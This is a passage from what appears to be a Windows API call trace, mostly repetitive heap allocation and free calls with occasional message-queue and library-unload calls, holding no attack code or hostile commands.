(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.026] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0185.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.027] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.028] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0185.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0185.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0185.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0185.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0185.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.031] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.032] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0185.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0185.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0185.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0185.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.035] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 